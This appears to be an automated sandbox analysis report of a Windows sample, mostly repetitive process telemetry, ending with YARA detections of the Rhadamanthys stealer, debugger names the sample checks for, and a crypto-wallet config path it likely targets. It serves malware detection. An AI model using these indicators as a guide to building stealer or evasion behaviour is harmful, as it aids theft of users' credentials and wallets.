                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D6448 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,27_2_00007DF4586D6448
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF652A632D4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,34_2_00007FF652A632D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B754D6 NtQuerySystemInformation,malloc,NtQuerySystemInformation,RtlGetVersion,lstrcmpiW,CloseHandle,free,7_2_05B754D6
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autoruns.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 00000007.00000002.289414206371.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.289413915589.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.289527976273.0000000003000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.289417352866.00000000054B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.289412154173.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.289410202861.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.289410380457.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.289414206371.0000000003453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.289414109956.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.289418154368.0000000005750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: svchost.exe, 0000001B.00000003.289631562126.0000018CD56DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\ElectrumSV\config
